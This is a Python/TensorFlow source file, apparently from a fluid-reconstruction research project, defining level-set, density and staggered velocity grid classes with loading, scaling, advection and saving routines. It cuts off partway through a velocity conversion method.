|
144416
|
import copy, os
import tensorflow as tf
import numpy as np
from lib.tf_ops import shape_list, spacial_shape_list, tf_tensor_stats, tf_norm2, tf_angle_between
from lib.util import load_numpy
from .renderer import Renderer
from .transform import GridTransform
from .vector import GridShape, Vector3
import logging
LOG = logging.getLogger("Structs")
# --- DATA Structs ---
def get_coord_field(shape, offset=[0,0,0], lod=0.0, concat=True):
'''
shape: z,y,x
offset: x,y,z
returns: 1,z,y,x,c with c=x,z,y,lod
'''
coord_z, coord_y, coord_x = tf.meshgrid(tf.range(shape[0], dtype=tf.float32), tf.range(shape[1], dtype=tf.float32), tf.range(shape[2], dtype=tf.float32), indexing='ij') #z,y,x
coord_data = [tf.reshape(coord_x + offset[0], [1]+shape+[1]),
tf.reshape(coord_y + offset[1], [1]+shape+[1]),
tf.reshape(coord_z + offset[2], [1]+shape+[1])] #3 x 1DHW1
if lod is not None:
lod_data = tf.constant(lod, shape=[1]+shape+[1], dtype=tf.float32) #tf.ones([1]+shape+[1])*lod
coord_data.append(lod_data)#4 x 1DHW1
if concat:
coord_data = tf.concat(coord_data, axis=-1)
return coord_data
class Zeroset:
def __init__(self, initial_value, shape=None, as_var=True, outer_bounds="OPEN", device=None, var_name="zeroset", trainable=True):
self.outer_bounds = outer_bounds
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
with tf.device(self._device):
if shape is not None:
assert isinstance(shape, GridShape)
initial_value = tf.constant(initial_value, shape=shape.value, dtype=tf.float32)
if as_var:
self._levelset = tf.Variable(initial_value=initial_value, name=var_name, trainable=trainable)
else:
self._levelset = tf.identity(initial_value)
@property
def grid_shape(self):
return GridShape.from_tensor(self._levelset)
def _hull_staggered_lerp_weight(self, a, b):
a_leq = tf.less_equal(a,0)
return tf.where( tf.logical_xor(a_leq, tf.less_equal(b,0)), #sign change along iterpolation
tf.abs( tf.divide( tf.minimum(a,b), tf.subtract(a,b) ) ),
tf.cast(a_leq, dtype=a.dtype)
)
def _hull_simple_staggered_component(self, axis):
assert axis in [1,2,3,-2,-3,-4]
axis = axis%5
pad = [(0,0),(0,0),(0,0),(0,0),(0,0)]
pad[axis]=(1,1)
shape = self.grid_shape.value
shape[axis] -= 1
offset = np.zeros((5,), dtype=np.int32)
cells_prev = tf.slice(self._levelset, offset, shape) #self._levelset[:,:,:,:-1,:]
offset[axis] += 1
cells_next = tf.slice(self._levelset, offset, shape) #self._levelset[:,:,:, 1:,:]
hull = self._hull_staggered_lerp_weight(cells_prev,cells_next)
hull = tf.pad(hull, pad, constant_values=1 if self.outer_bounds=="OPEN" else 0)
return hull
def to_hull_simple_staggered(self):
return self._hull_simple_staggered_component(-2), self._hull_simple_staggered_component(-3), self._hull_simple_staggered_component(-4)
def to_hull_simple_centered(self):
raise NotImplementedError()
def to_denstiy_simple_centered(self):
return tf.where(tf.greater(self._levelset, 0), 250, 0)
def resize(self, shape):
assert shape_list(shape)==[3]
new_shape = GridShape(shape)
if new_shape==self.grid_shape:
return
raise NotImplementedError("Zeroset.resize() not implemented.")
def assign(levelset):
raise NotImplementedError()
class DensityGrid:
def __init__(self, shape, constant=0.1, as_var=True, d=None, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="denstiy", trainable=True, restrict_to_hull=True):
self.shape = shape
if d is not None:
d_shape = shape_list(d)
if not len(d_shape)==5 or not d_shape[-1]==1 or not self.shape==spacial_shape_list(d):
raise ValueError("Invalid shape of density on assignment: %s"%d_shape)
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
if as_var:
rand_init = tf.constant_initializer(constant)
with tf.device(self._device):
self._d = tf.Variable(initial_value=d if d is not None else rand_init(shape=[1]+self.shape+[1], dtype=tf.float32), name=var_name+'_dens', trainable=True)
else:
with tf.device(self._device):
if d is not None:
self._d = tf.constant(d, dtype=tf.float32)
else:
self._d = tf.constant(constant, shape=[1]+self.shape+[1], dtype=tf.float32)
self.scale_renderer = scale_renderer
with tf.device(self._device):
self.hull = tf.constant(hull, dtype=tf.float32) if hull is not None else None
self.restrict_to_hull = restrict_to_hull
if inflow is not None:
with tf.device(self._device):
if isinstance(inflow, str) and inflow=='CONST':
assert isinstance(inflow_mask, (tf.Tensor, np.ndarray))
inflow = rand_init(shape=shape_list(inflow_mask), dtype=tf.float32)
if as_var:
self._inflow = tf.Variable(initial_value=inflow, name=var_name+'_inflow', trainable=True)
else:
self._inflow = tf.constant(inflow, dtype=tf.float32)
self.inflow_mask = tf.constant(inflow_mask, dtype=tf.float32) if inflow_mask is not None else None
inflow_shape = spacial_shape_list(self._inflow) #.get_shape().as_list()[-4:-1]
self._inflow_padding = [[0,0]]+[[inflow_offset[_],self.shape[_]-inflow_offset[_]-inflow_shape[_]] for _ in range(3)]+[[0,0]]
self.inflow_offset = inflow_offset
else:
self._inflow = None
@property
def trainable(self):
return self._is_trainable and self.is_var
@property
def d(self):
if self.restrict_to_hull:
return self.with_hull()
else:
return tf.identity(self._d)
def with_hull(self):
if self.hull is not None:
return self._d * self.hull # hull is a (smooth) binary mask
else:
return tf.identity(self._d)
@property
def inflow(self):
if self._inflow is None:
return tf.zeros_like(self._d, dtype=tf.float32)
elif self.inflow_mask is not None: #hasattr(self, 'inflow_mask') and
return tf.pad(self._inflow*self.inflow_mask, self._inflow_padding)
else:
return tf.pad(self._inflow, self._inflow_padding)
def with_inflow(self):
density = self.d
if self._inflow is not None:
density = tf.maximum(density+self.inflow, 0)
return density
@classmethod
def from_file(cls, path, as_var=True, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="denstiy", trainable=True, restrict_to_hull=True):
try:
with np.load(path) as np_data:
d = np_data['arr_0']
shape =spacial_shape_list(d)
if 'hull' in np_data and hull is None:
hull = np_data['hull']
if 'inflow' in np_data and inflow is None:
inflow=np_data['inflow']
if 'inflow_mask' in np_data and inflow_mask is None:
inflow_mask=np_data['inflow_mask']
if 'inflow_offset' in np_data and inflow_offset is None:
inflow_offset=np_data['inflow_offset'].tolist()
grid = cls(shape, d=d, as_var=as_var, scale_renderer=scale_renderer, hull=hull, inflow=inflow, inflow_offset=inflow_offset, inflow_mask=inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
except:
LOG.warning("Failed to load density from '%s':", path, exc_info=True)
return None
else:
return grid
@classmethod
def from_scalarFlow_file(cls, path, as_var=True, shape=None, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="sF_denstiy", trainable=True, restrict_to_hull=True):
# if shape is set the loaded grid will be reshaped if necessary
density = load_numpy(path).astype(np.float32)[::-1]
density = density.reshape([1] + list(density.shape)) #
density = tf.constant(density, dtype=tf.float32)
d_shape = spacial_shape_list(density)
if shape is not None and shape!=d_shape:
if scale_renderer is None:
raise ValueError("No renderer provided to scale density.")
LOG.debug("scaling scalarFlow density from %s to %s", d_shape, shape)
density = scale_renderer.resample_grid3D_aligned(density, shape)
d_shape = shape
else:
# cut of SF inflow region and set as inflow. or is it already cut off in SF dataset? it is, but not in the synth dataset or my own sF runs.
# lower 15 cells...
inflow, density= tf.split(density, [15, d_shape[1]-15], axis=-3)
inflow_mask = tf.ones_like(inflow, dtype=tf.float32)
inflow_offset = [0,0,0]
density = tf.concat([tf.zeros_like(inflow, dtype=tf.float32), density], axis=-3)
return cls(d_shape, d=density, as_var=as_var, scale_renderer=scale_renderer, hull=hull, inflow=inflow, inflow_offset=inflow_offset, inflow_mask=inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
def copy(self, as_var=None, device=None, var_name=None, trainable=None, restrict_to_hull=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_cpy'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
if self._inflow is not None:
grid = DensityGrid(self.shape, d=tf.identity(self._d), as_var=as_var, scale_renderer=self.scale_renderer, hull=self.hull, \
inflow=tf.identity(self._inflow), inflow_offset=self.inflow_offset, inflow_mask=self.inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
else:
grid = DensityGrid(self.shape, d=tf.identity(self._d), as_var=as_var, scale_renderer=self.scale_renderer, hull=self.hull, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def scaled(self, new_shape, with_inflow=False):
if not (isinstance(new_shape, list) and len(new_shape)==3):
raise ValueError("Invalid shape")
density = self.d if not with_inflow else self.with_inflow()
if new_shape!=self.shape:
LOG.debug("Scaling density from %s to %s", self.shape, new_shape)
with self.scale_renderer.profiler.sample("scale density"):
d_scaled = self.scale_renderer.resample_grid3D_aligned(density, new_shape)
else:
LOG.debug("No need to scale density to same shape %s", self.shape)
d_scaled = tf.identity(density)
return d_scaled
def copy_scaled(self, new_shape, as_var=None, device=None, var_name=None, trainable=None, restrict_to_hull=None):
'''Does not copy inflow and hull, TODO'''
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_scaled'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
d_scaled = self.scaled(new_shape)
grid = DensityGrid(new_shape, d=d_scaled, as_var=as_var, scale_renderer=self.scale_renderer, device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def warped(self, vel_grid, order=1, dt=1.0, clamp="NONE"):
if not (isinstance(vel_grid, VelocityGrid)):
raise ValueError("Invalid velocity grid")
return vel_grid.warp(self.with_inflow(), order=order, dt=dt, clamp=clamp)
def copy_warped(self, vel_grid, as_var=None, order=1, dt=1.0, device=None, var_name=None, clamp="NONE", trainable=None, restrict_to_hull=None):
'''Does not copy inflow and hull, TODO'''
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_warped'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
d_warped = self.warped(vel_grid, order=order, dt=dt, clamp=clamp)
grid = DensityGrid(self.shape, d=d_warped, as_var=as_var, scale_renderer=self.scale_renderer, device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def scale(self, scale):
self.assign(self._d*scale)
def apply_clamp(self, vmin, vmax):
vmin = tf.maximum(vmin, 0)
d = tf.clip_by_value(self._d, vmin, vmax)
inflow = None
if self._inflow is not None:
# use already clamped density for consistency
denstiy_shape = shape_list(d)
density_cropped = d[self._inflow_padding[0][0] : denstiy_shape[0]-self._inflow_padding[0][1],
self._inflow_padding[1][0] : denstiy_shape[1]-self._inflow_padding[1][1],
self._inflow_padding[2][0] : denstiy_shape[2]-self._inflow_padding[2][1],
self._inflow_padding[3][0] : denstiy_shape[3]-self._inflow_padding[3][1],
self._inflow_padding[4][0] : denstiy_shape[4]-self._inflow_padding[4][1]]
inflow = tf.clip_by_value(self._inflow, vmin - density_cropped, vmax - density_cropped)
self.assign(d, inflow)
def assign(self, d, inflow=None):
shape = shape_list(d)
if not len(shape)==5 or not shape[-1]==1 or not shape[-4:-1]==self.shape:
raise ValueError("Invalid or incompatible shape of density on assignment: is {}, required: NDHW1 with DHW={}".format(shape, self.shape))
if self.is_var:
self._d.assign(d)
if self._inflow is not None and inflow is not None:
self._inflow.assign(inflow)
else:
with tf.device(self._device):
self._d = tf.identity(d)
if self._inflow is not None and inflow is not None:
self._inflow = tf.identity(inflow)
def var_list(self):
if self.is_var:
if self._inflow is not None:
return [self._d, self._inflow]
return [self._d]
else:
raise TypeError("This DensityGrid is not a variable.")
def get_variables(self):
if self.is_var:
var_dict = {'density': self._d}
if self._inflow is not None:
var_dict['inflow'] = self._inflow
return var_dict
else:
raise TypeError("This DensityGrid is not a variable.")
def save(self, path):
density = self._d
if isinstance(density, (tf.Tensor, tf.Variable)):
density = density.numpy()
save = {}
if self.hull is not None:
hull = self.hull
if isinstance(hull, (tf.Tensor, tf.Variable)):
hull = hull.numpy()
save['hull']=hull
if self._inflow is not None:
inflow = self._inflow
if isinstance(inflow, (tf.Tensor, tf.Variable)):
inflow = inflow.numpy()
save['inflow']=inflow
if self.inflow_mask is not None:
inflow_mask = self.inflow_mask
if isinstance(inflow_mask, (tf.Tensor, tf.Variable)):
inflow_mask = inflow_mask.numpy()
save['inflow_mask']=inflow_mask
save['inflow_offset']=np.asarray(self.inflow_offset)
np.savez_compressed(path, density, **save)
def mean(self):
return tf.reduce_mean(self.d)
def stats(self, mask=None, state=None, **warp_kwargs):
'''
mask: optional binary float mask, stats only consider cells>0.5
'''
d = self.d
if mask is not None:
mask = mask if mask.dtype==tf.bool else tf.greater(mask, 0.5)
d = tf.boolean_mask(d, mask)
stats = {
'density': tf_tensor_stats(d, as_dict=True),
'shape':self.shape,
}
if state is not None and state.prev is not None and state.prev.density is not None and state.prev.velocity is not None:
warp_SE = tf.squared_difference(state.prev.density_advected(**warp_kwargs), self.d)
if mask is not None:
warp_SE = tf.boolean_mask(warp_SE, mask)
stats["warp_SE"] = tf_tensor_stats(warp_SE, as_dict=True)
else:
stats["warp_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
return stats
class VelocityGrid:
@staticmethod
def component_shapes(centered_shape):
x_shape = copy.copy(centered_shape)
x_shape[2] +=1
y_shape = copy.copy(centered_shape)
y_shape[1] +=1
z_shape = copy.copy(centered_shape)
z_shape[0] +=1
return x_shape, y_shape, z_shape
def __init__(self, centered_shape, std=0.1, as_var=True, x=None, y=None, z=None, boundary=None, scale_renderer=None, warp_renderer=None, *, coords=None, lod=None, device=None, var_name="velocity", trainable=True):
self.centered_shape = centered_shape.tolist() if isinstance(centered_shape, np.ndarray) else centered_shape
self.x_shape, self.y_shape, self.z_shape = VelocityGrid.component_shapes(self.centered_shape)
self.set_boundary(boundary)
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
if as_var:
if x is not None:
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid shape of velocity x component on assignment")
if y is not None:
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid shape of velocity y component on assignment")
if z is not None:
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid shape of velocity z component on assignment")
# in a box
#rand_init = tf.random_normal_initializer(0.0, std)
std = tf.abs(std)
rand_init = tf.random_uniform_initializer(-std, std)
# maybe even uniformly in space and in a sphere?: http://6degreesoffreedom.co/circle-random-sampling/
with tf.device(self._device):
self._x = tf.Variable(initial_value=x if x is not None else rand_init(shape=[1]+self.x_shape+[1], dtype=tf.float32), name=var_name + '_x', trainable=True)
self._y = tf.Variable(initial_value=y if y is not None else rand_init(shape=[1]+self.y_shape+[1], dtype=tf.float32), name=var_name + '_y', trainable=True)
self._z = tf.Variable(initial_value=z if z is not None else rand_init(shape=[1]+self.z_shape+[1], dtype=tf.float32), name=var_name + '_z', trainable=True)
else:
if x is None:
x = tf.constant(tf.random.uniform([1]+self.x_shape+[1], -std, std, dtype=tf.float32))
if y is None:
y = tf.constant(tf.random.uniform([1]+self.y_shape+[1], -std, std, dtype=tf.float32))
if z is None:
z = tf.constant(tf.random.uniform([1]+self.z_shape+[1], -std, std, dtype=tf.float32))
self.assign(x,y,z)
if lod is None:
lod = tf.zeros([1]+self.centered_shape+[1])
with tf.device(self._device):
self.lod_pad = tf.identity(lod)
self.scale_renderer = scale_renderer
if self.scale_renderer is not None:
if (self.outer_bounds=='CLOSED' and self.scale_renderer.boundary_mode!='BORDER') \
or (self.outer_bounds=='OPEN' and self.scale_renderer.boundary_mode!='CLAMP'):
LOG.warning("Velocity outer boundary %s does not match scale renderer boundary mode %s", self.outer_bounds, self.scale_renderer.boundary_mode)
self.warp_renderer = warp_renderer
if self.warp_renderer is not None:
if (self.outer_bounds=='CLOSED' and self.warp_renderer.boundary_mode!='BORDER') \
or (self.outer_bounds=='OPEN' and self.warp_renderer.boundary_mode!='CLAMP'):
LOG.warning("Velocity outer boundary %s does not match scale renderer boundary mode %s", self.outer_bounds, self.warp_renderer.boundary_mode)
def set_boundary(self, boundary):
assert (boundary is None) or isinstance(boundary, Zeroset)
self.boundary = boundary
self.outer_bounds = self.boundary.outer_bounds if self.boundary is not None else "OPEN"
@property
def trainable(self):
return self._is_trainable and self.is_var
@property
def x(self):
v = self._x
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-2)
return v
@property
def y(self):
v = self._y
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-3)
return v
@property
def z(self):
v = self._z
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-4)
return v
@classmethod
def from_centered(cls, centered_grid, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="velocity", trainable=True):
centered_shape = shape_list(centered_grid)
assert len(centered_shape)==5
assert centered_shape[-1]==3
assert centered_shape[0]==1
centered_shape = centered_shape[-4:-1]
vel_grid = cls(centered_shape, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
x,y,z = vel_grid._centered_to_staggered(centered_grid)
vel_grid.assign(x,y,z)
return vel_grid
@classmethod
def from_file(cls, path, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="velocity", trainable=True):
try:
with np.load(path) as vel:
if 'centered_shape' not in vel:#legacy
shape = shape_list(vel["vel_x"])
LOG.debug("%s", shape)
shape[-2] -=1
shape = shape[1:-1]
else:
shape = vel['centered_shape'].tolist()
vel_grid = cls(shape, x=vel["vel_x"].astype(np.float32), y=vel["vel_y"].astype(np.float32), z=vel["vel_z"].astype(np.float32), \
as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
except:
LOG.warning("Failed to load velocity from '%s':", path, exc_info=True)
return None
else:
return vel_grid
@classmethod
def from_scalarFlow_file(cls, path, as_var=True, shape=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="sF_velocity", trainable=True):
# sF velocities are stored as combined staggered grid with upper cells missing, DHWC with C=3
velocity = load_numpy(path).astype(np.float32)[::-1]
v_shape = GridShape.from_tensor(velocity)
velocity = v_shape.normalize_tensor_shape(velocity) #.reshape([1] + list(velocity.shape)) # NDHWC
velocity = tf.constant(velocity, dtype=tf.float32)
v_shape = v_shape.zyx.value
v_x, v_y, v_z = tf.split(velocity, 3, axis=-1)
p0 = (0,0)
# extend missing upper cell
v_x = tf.pad(v_x, [p0,p0,p0,(0,1),p0], "SYMMETRIC")
v_y = tf.pad(v_y, [p0,p0,(0,1),p0,p0], "SYMMETRIC")
v_z = tf.pad(-v_z, [p0,(1,0),p0,p0,p0], "SYMMETRIC") #z value/direction reversed, pad lower value as axis is reversed (?)
#v_shape = spacial_shape_list(velocity)
if shape is not None and v_shape!=shape:
assert len(shape)==3
if scale_renderer is None:
raise ValueError("No renderer provided to scale velocity.")
# shape = GridShape(shape).zyx
# vel_scale = shape/v_shape #[o/i for i,o in zip(v_shape, shape)] #z,y,x
LOG.debug("scaling scalarFlow velocity from %s to %s with magnitude scale %s", v_shape, shape)
v_tmp = cls(v_shape, x=v_x, y=v_y, z=v_z, as_var=False, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name="sF_tmp", trainable=False)
v_x, v_y, v_z = v_tmp.scaled(shape, scale_magnitude=True)
# can only scale 1 and 4 channel grids
# v_x = scale_renderer.resample_grid3D_aligned(v_x, shape.value)*vel_scale.x#[2]
# v_y = scale_renderer.resample_grid3D_aligned(v_y, shape.value)*vel_scale.y#[1]
# v_z = scale_renderer.resample_grid3D_aligned(v_z, shape.value)*vel_scale.z#[0]
# velocity = tf.concat([v_x, v_y, v_z], axis=-1)
v_shape = shape
#return cls.from_centered(velocity,as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name)
return cls(v_shape, x=v_x, y=v_y, z=v_z,as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
def copy(self, as_var=None, device=None, var_name=None, trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_cpy'
if trainable is None:
trainable = self._is_trainable
grid = VelocityGrid(self.centered_shape, x=tf.identity(self._x), y=tf.identity(self._y), z=tf.identity(self._z), as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def scaled(self, centered_shape, scale_magnitude=True):
if not (isinstance(centered_shape, list) and len(centered_shape)==3):
raise ValueError("Invalid shape")
#resample velocity
if centered_shape!=self.centered_shape:
with self.scale_renderer.profiler.sample("scale velocity"):
x_shape, y_shape, z_shape = VelocityGrid.component_shapes(centered_shape)
LOG.debug("Scaling velocity from %s to %s", self.centered_shape, centered_shape)
x_scaled = self.scale_renderer.resample_grid3D_aligned(self.x, x_shape, align_x='center')
y_scaled = self.scale_renderer.resample_grid3D_aligned(self.y, y_shape, align_y='center')
z_scaled = self.scale_renderer.resample_grid3D_aligned(self.z, z_shape, align_z='center')
if scale_magnitude:
vel_scale = [o/i for i,o in zip(self.centered_shape, centered_shape)] #z,y,x
LOG.debug("Scaling velocity magnitude with %s", vel_scale)
x_scaled *= vel_scale[2]
y_scaled *= vel_scale[1]
z_scaled *= vel_scale[0]
else:
LOG.debug("No need to scale velocity to same shape %s", self.centered_shape)
x_scaled = tf.identity(self.x)
y_scaled = tf.identity(self.y)
z_scaled = tf.identity(self.z)
return x_scaled, y_scaled, z_scaled
def copy_scaled(self, centered_shape, scale_magnitude=True, as_var=None, device=None, var_name=None, trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_scaled'
if trainable is None:
trainable = self._is_trainable
x_scaled, y_scaled, z_scaled = self.scaled(centered_shape, scale_magnitude)
grid = VelocityGrid(centered_shape, x=x_scaled, y=y_scaled, z=z_scaled, as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def _lut_warp_vel(self, shape, dt=1.0):
# use to get lookup positions to warp velocity components
vel = self._sampled_to_shape(shape) #3 x 1DHW1
vel_lut = [- vel[i]*dt for i in range(len(vel))] #3 x 1DHW1
vel_lut = tf.concat(vel_lut, axis = -1) #1DHW3
return vel_lut
def _warp_vel_component(self, data, lut, order=1, dt=1.0, clamp="NONE"):
if order<1 or order>2:
raise ValueError("Unsupported warp order '{}'".format(order))
warped = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
clamp = clamp.upper()
if order==2: #MacCormack
warped_back = self.warp_renderer._sample_LuT(warped, -lut, True, relative=True)
corrected = warped + 0.5*(data-warped_back)
if clamp=="MC" or clamp=="MC_SMOOTH":
#raise NotImplementedError("MacCormack clamping has not been implemented.")
fm = self.warp_renderer.filter_mode
self.warp_renderer.filter_mode = "MIN"
data_min = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
self.warp_renderer.filter_mode = "MAX"
data_max = self.warp_renderer._sample_LuT(data, lut, True, relative=True)
self.warp_renderer.filter_mode = fm
if clamp=='MC':
#LOG.warning("Experimental clamp for MacCormack velocity advection.")
raise NotImplementedError("MIM and MAX warp sampling have wrong gradients.")
corrected = tf.clip_by_value(corrected, data_min, data_max)
if clamp=='MC_SMOOTH':
#LOG.warning("Experimental 'revert' clamp for MacCormack velocity advection.")
clamp_OOB = tf.logical_or(tf.less(corrected, data_min), tf.greater(corrected, data_max))
corrected = tf.where(clamp_OOB, warped, corrected)
warped = corrected
return warped
def warped(self, vel_grid=None, order=1, dt=1.0, clamp="NONE"):
if vel_grid is None:
#vel_grid = self
pass
elif not isinstance(vel_grid, VelocityGrid):
raise TypeError("Invalid VelocityGrid")
with self.warp_renderer.profiler.sample("warp velocity"):
LOG.debug("Warping velocity grid")
#TODO will cause errors if grid shapes do not match, resample if necessary?
if vel_grid is None:
lut_x = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('X', concat=False)], axis=-1)
else:
lut_x = vel_grid._lut_warp_vel(self.x_shape, dt)
x_warped = self._warp_vel_component(self.x, lut_x, order=order, dt=dt, clamp=clamp)
del lut_x
if vel_grid is None:
lut_y = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('Y', concat=False)], axis=-1)
else:
lut_y = vel_grid._lut_warp_vel(self.y_shape, dt)
y_warped = self._warp_vel_component(self.y, lut_y, order=order, dt=dt, clamp=clamp)
del lut_y
if vel_grid is None:
lut_z = tf.concat([-vel*dt for vel in self._sampled_to_component_shape('Z', concat=False)], axis=-1)
else:
lut_z = vel_grid._lut_warp_vel(self.z_shape, dt)
z_warped = self._warp_vel_component(self.z, lut_z, order=order, dt=dt, clamp=clamp)
del lut_z
return x_warped, y_warped, z_warped
def copy_warped(self, vel_grid=None, as_var=None, order=1, dt=1.0, device=None, var_name=None, clamp="NONE", trainable=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_warped'
if trainable is None:
trainable = self._is_trainable
x_warped, y_warped, z_warped = self.warped(vel_grid, order, dt, clamp=clamp)
grid = VelocityGrid(self.centered_shape, x=x_warped, y=y_warped, z=z_warped, as_var=as_var, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=device, var_name=var_name, trainable=trainable)
return grid
def divergence_free(self, residual=1e-5):
raise NotImplementedError
def var_list(self):
if self.is_var:
return [self._x, self._y, self._z]
else:
raise TypeError("This VelocityGrid is not a variable.")
def get_variables(self):
if self.is_var:
return {'velocity_x': self._x, 'velocity_y': self._y, 'velocity_z': self._z}
else:
raise TypeError("This VelocityGrid is not a variable.")
def save(self, path):
np.savez_compressed(path, centered_shape=self.centered_shape, vel_x=self.x.numpy(), vel_y=self.y.numpy(), vel_z=self.z.numpy())
def assign(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign(x)
self._y.assign(y)
self._z.assign(z)
else:
with tf.device(self._device):
self._x = tf.identity(x)
self._y = tf.identity(y)
self._z = tf.identity(z)
def assign_add(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign_add(x)
self._y.assign_add(y)
self._z.assign_add(z)
else:
with tf.device(self._device):
self._x = tf.identity(self._x+x)
self._y = tf.identity(self._y+y)
self._z = tf.identity(self._z+z)
def assign_sub(self, x,y,z):
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid or incompatible shape of velocity x component on assignment: is {}, required: NDHW1 with DHW={}".format(x_shape, self.x_shape))
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid or incompatible shape of velocity y component on assignment: is {}, required: NDHW1 with DHW={}".format(y_shape, self.y_shape))
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid or incompatible shape of velocity z component on assignment: is {}, required: NDHW1 with DHW={}".format(z_shape, self.z_shape))
if self.is_var:
self._x.assign_sub(x)
self._y.assign_sub(y)
self._z.assign_sub(z)
else:
with tf.device(self._device):
self._x = tf.identity(self._x-x)
self._y = tf.identity(self._y-y)
self._z = tf.identity(self._z-z)
def scale_magnitude(self, scale):
if np.isscalar(scale):
scale = [scale]*3
assert len(scale)==3
self.assign(self.x*scale[0],self.y*scale[1], self.z*scale[2])
def _centered_to_staggered(self, centered):
centered_shape = shape_list(centered)
assert len(centered_shape)==5
assert centered_shape[-1]==3
assert centered_shape[0]==1
assert self.centered_shape==centered_shape[-4:-1]
with self.scale_renderer.profiler.sample("centered velocity to staggered"):
x,y,z= tf.split(centered, 3, axis=-1)
centered_x_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.x_shape[::-1]], center=True)
